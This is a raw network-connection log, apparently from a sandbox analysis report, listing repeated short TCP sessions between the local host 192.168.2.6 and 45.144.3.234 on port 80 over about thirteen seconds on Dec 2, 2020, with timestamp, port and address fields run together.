                                            Dec 2, 2020 11:53:22.162085056 CET804981745.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:22.162149906 CET804981745.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:22.162348032 CET4981780192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:22.162379026 CET4981780192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:22.216130018 CET804981745.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:23.138226986 CET4981880192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:23.190316916 CET804981845.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:23.190450907 CET4981880192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:23.193449974 CET4981880192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:23.245274067 CET804981845.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:23.245426893 CET4981880192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:23.297297955 CET804981845.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:23.321213007 CET804981845.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:23.321234941 CET804981845.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:23.321367025 CET4981880192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:23.321423054 CET4981880192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:23.375961065 CET804981845.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:23.544775963 CET4982080192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:23.597565889 CET804982045.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:23.597659111 CET4982080192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:23.601424932 CET4982080192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:23.656368017 CET804982045.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:23.656766891 CET4982080192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:23.709347010 CET804982045.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:23.731801987 CET804982045.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:23.731869936 CET804982045.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:23.731990099 CET4982080192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:23.732027054 CET4982080192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:23.784678936 CET804982045.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:23.913642883 CET4982180192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:23.965364933 CET804982145.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:23.965523958 CET4982180192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:23.968585968 CET4982180192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:24.022254944 CET804982145.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:24.022847891 CET4982180192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:24.074608088 CET804982145.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:24.096740961 CET804982145.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:24.096772909 CET804982145.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:24.096889973 CET4982180192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:24.099621058 CET4982180192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:24.154330969 CET804982145.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:24.350528002 CET4982280192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:24.402568102 CET804982245.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:24.402756929 CET4982280192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:24.405828953 CET4982280192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:24.457627058 CET804982245.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:24.457792044 CET4982280192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:24.509629011 CET804982245.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:24.532399893 CET804982245.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:24.532428980 CET804982245.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:24.532685041 CET4982280192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:24.532893896 CET4982280192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:24.584471941 CET804982245.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:24.776787043 CET4982480192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:24.830406904 CET804982445.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:24.831285000 CET4982480192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:24.836771011 CET4982480192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:24.889359951 CET804982445.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:24.889547110 CET4982480192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:24.942713022 CET804982445.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:24.964977026 CET804982445.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:24.965009928 CET804982445.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:24.965153933 CET4982480192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:24.965195894 CET4982480192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:25.017604113 CET804982445.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:25.191215038 CET4982580192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:25.243761063 CET804982545.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:25.245834112 CET4982580192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:25.252017975 CET4982580192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:25.304713011 CET804982545.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:25.304867983 CET4982580192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:25.358211994 CET804982545.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:25.382786036 CET804982545.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:25.382873058 CET804982545.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:25.382988930 CET4982580192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:25.383095026 CET4982580192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:25.436068058 CET804982545.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:25.572241068 CET4982680192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:25.625380993 CET804982645.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:25.625543118 CET4982680192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:25.628463984 CET4982680192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:25.681250095 CET804982645.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:25.681499004 CET4982680192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:25.734711885 CET804982645.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:25.760842085 CET804982645.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:25.761040926 CET4982680192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:25.763088942 CET804982645.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:25.763175011 CET4982680192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:25.813847065 CET804982645.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:25.976474047 CET4982880192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:26.029331923 CET804982845.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:26.029457092 CET4982880192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:26.033210039 CET4982880192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:26.086132050 CET804982845.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:26.086241007 CET4982880192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:26.139024019 CET804982845.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:26.161587954 CET804982845.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:26.161613941 CET804982845.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:26.161751986 CET4982880192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:26.161803007 CET4982880192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:26.215125084 CET804982845.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:26.389996052 CET4982980192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:26.441704035 CET804982945.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:26.441811085 CET4982980192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:26.444756031 CET4982980192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:26.496412992 CET804982945.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:26.496526957 CET4982980192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:26.561677933 CET804982945.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:26.583801031 CET804982945.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:26.583827972 CET804982945.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:26.583961010 CET4982980192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:26.584003925 CET4982980192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:26.635718107 CET804982945.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:26.825644970 CET4983080192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:26.878014088 CET804983045.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:26.879125118 CET4983080192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:26.882936001 CET4983080192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:26.935108900 CET804983045.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:26.936121941 CET4983080192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:26.988255978 CET804983045.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:27.009886026 CET804983045.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:27.009906054 CET804983045.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:27.010024071 CET4983080192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:27.010057926 CET4983080192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:27.062356949 CET804983045.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:27.230201960 CET4983280192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:27.282215118 CET804983245.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:27.283480883 CET4983280192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:27.289891005 CET4983280192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:27.342000961 CET804983245.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:27.345532894 CET4983280192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:27.402134895 CET804983245.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:27.425017118 CET804983245.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:27.425060987 CET804983245.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:27.425184965 CET4983280192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:27.425276995 CET4983280192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:27.477523088 CET804983245.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:27.659352064 CET4983380192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:27.711082935 CET804983345.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:27.711317062 CET4983380192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:27.719155073 CET4983380192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:27.772186995 CET804983345.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:27.772336960 CET4983380192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:27.824167967 CET804983345.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:27.845240116 CET804983345.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:27.845283031 CET804983345.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:27.845365047 CET4983380192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:27.845395088 CET4983380192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:27.898968935 CET804983345.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:28.097274065 CET4983580192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:28.150737047 CET804983545.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:28.153979063 CET4983580192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:28.159276962 CET4983580192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:28.211020947 CET804983545.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:28.211191893 CET4983580192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:28.263439894 CET804983545.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:28.285478115 CET804983545.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:28.285551071 CET804983545.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:28.285698891 CET4983580192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:28.285821915 CET4983580192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:28.337516069 CET804983545.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:28.518063068 CET4983780192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:28.571096897 CET804983745.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:28.571227074 CET4983780192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:28.578865051 CET4983780192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:28.632896900 CET804983745.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:28.633028030 CET4983780192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:28.686239958 CET804983745.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:28.707381010 CET804983745.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:28.707401037 CET804983745.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:28.707464933 CET4983780192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:28.707582951 CET4983780192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:28.760190010 CET804983745.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:28.939691067 CET4983880192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:28.992391109 CET804983845.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:28.992521048 CET4983880192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:28.995225906 CET4983880192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:29.047892094 CET804983845.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:29.048046112 CET4983880192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:29.100907087 CET804983845.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:29.124566078 CET804983845.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:29.124599934 CET804983845.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:29.124728918 CET4983880192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:29.124875069 CET4983880192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:29.177875996 CET804983845.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:29.365062952 CET4984080192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:29.417083979 CET804984045.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:29.417249918 CET4984080192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:29.419858932 CET4984080192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:29.472815990 CET804984045.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:29.472934961 CET4984080192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:29.524908066 CET804984045.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:29.546129942 CET804984045.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:29.546181917 CET804984045.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:29.546240091 CET4984080192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:29.547426939 CET4984080192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:29.630023956 CET804984045.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:29.775156975 CET4984180192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:29.829530001 CET804984145.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:29.829902887 CET4984180192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:29.835345984 CET4984180192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:29.887653112 CET804984145.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:29.887763023 CET4984180192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:29.940536976 CET804984145.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:29.961003065 CET804984145.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:29.961066008 CET804984145.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:29.961190939 CET4984180192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:29.961222887 CET4984180192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:30.013757944 CET804984145.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:30.185509920 CET4984380192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:30.237936974 CET804984345.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:30.238069057 CET4984380192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:30.245196104 CET4984380192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:30.297610044 CET804984345.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:30.297722101 CET4984380192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:30.350331068 CET804984345.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:30.371175051 CET804984345.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:30.371220112 CET804984345.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:30.371309996 CET4984380192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:30.371455908 CET4984380192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:30.428301096 CET804984345.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:30.564183950 CET4984480192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:30.618022919 CET804984445.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:30.618380070 CET4984480192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:30.625790119 CET4984480192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:30.678446054 CET804984445.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:30.678523064 CET4984480192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:30.731322050 CET804984445.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:30.751743078 CET804984445.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:30.751765013 CET804984445.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:30.751837015 CET4984480192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:30.751919031 CET4984480192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:30.811743021 CET804984445.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:30.978940010 CET4984580192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:31.034748077 CET804984545.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:31.034946918 CET4984580192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:31.037564993 CET4984580192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:31.089977980 CET804984545.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:31.090195894 CET4984580192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:31.142779112 CET804984545.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:31.164427042 CET804984545.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:31.164478064 CET804984545.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:31.164663076 CET4984580192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:31.164716005 CET4984580192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:31.215899944 CET804984545.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:31.444353104 CET4984680192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:31.497487068 CET804984645.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:31.497705936 CET4984680192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:31.503457069 CET4984680192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:31.556246042 CET804984645.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:31.556354046 CET4984680192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:31.609268904 CET804984645.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:31.630878925 CET804984645.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:31.630913019 CET804984645.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:31.631036997 CET4984680192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:31.631180048 CET4984680192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:31.683765888 CET804984645.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:31.815676928 CET4984780192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:31.868180990 CET804984745.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:31.868330002 CET4984780192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:31.875174999 CET4984780192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:31.927330017 CET804984745.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:31.927525997 CET4984780192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:31.979768038 CET804984745.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:32.010010004 CET804984745.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:32.010061979 CET804984745.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:32.010248899 CET4984780192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:32.010293007 CET4984780192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:32.062422991 CET804984745.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:32.250581026 CET4984880192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:32.302825928 CET804984845.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:32.302956104 CET4984880192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:32.306005955 CET4984880192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:32.358144999 CET804984845.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:32.358225107 CET4984880192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:32.410345078 CET804984845.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:32.430725098 CET804984845.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:32.432288885 CET804984845.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:32.432377100 CET4984880192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:32.432406902 CET4984880192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:32.485778093 CET804984845.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:32.617280960 CET4984980192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:32.674591064 CET804984945.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:32.674726009 CET4984980192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:32.677638054 CET4984980192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:32.732040882 CET804984945.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:32.732115984 CET4984980192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:32.784238100 CET804984945.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:32.804538965 CET804984945.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:32.804562092 CET804984945.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:32.804666996 CET4984980192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:32.804758072 CET4984980192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:32.856996059 CET804984945.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:33.032654047 CET4985080192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:33.085652113 CET804985045.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:33.085855007 CET4985080192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:33.088546991 CET4985080192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:33.141709089 CET804985045.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:33.142995119 CET4985080192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:33.196037054 CET804985045.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:33.217117071 CET804985045.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:33.217170954 CET804985045.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:33.217288971 CET4985080192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:33.217325926 CET4985080192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:33.270453930 CET804985045.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:33.469849110 CET4985180192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:33.522649050 CET804985145.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:33.523597002 CET4985180192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:33.527612925 CET4985180192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:33.579768896 CET804985145.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:33.580550909 CET4985180192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:33.632709980 CET804985145.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:33.653285980 CET804985145.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:33.653312922 CET804985145.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:33.653551102 CET4985180192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:33.653693914 CET4985180192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:33.705720901 CET804985145.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:33.877085924 CET4985380192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:33.930222988 CET804985345.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:33.930392981 CET4985380192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:33.937055111 CET4985380192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:33.988833904 CET804985345.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:33.989012957 CET4985380192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:34.040710926 CET804985345.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:34.063106060 CET804985345.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:34.063137054 CET804985345.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:34.063282967 CET4985380192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:34.063361883 CET4985380192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:34.115313053 CET804985345.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:34.310731888 CET4985480192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:34.363538980 CET804985445.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:34.363689899 CET4985480192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:34.366689920 CET4985480192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:34.421909094 CET804985445.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:34.422066927 CET4985480192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:34.474798918 CET804985445.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:34.511687994 CET804985445.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:34.511715889 CET804985445.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:34.511831999 CET4985480192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:34.511876106 CET4985480192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:34.564847946 CET804985445.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:34.746962070 CET4985580192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:34.799989939 CET804985545.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:34.800142050 CET4985580192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:34.808233976 CET4985580192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:34.861092091 CET804985545.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:34.861234903 CET4985580192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:34.914186001 CET804985545.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:34.935148001 CET804985545.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:34.935170889 CET804985545.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:34.935337067 CET4985580192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:34.935509920 CET4985580192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:34.988194942 CET804985545.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:35.176364899 CET4985680192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:35.228935957 CET804985645.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:35.229052067 CET4985680192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:35.232012987 CET4985680192.168.2.645.144.3.234
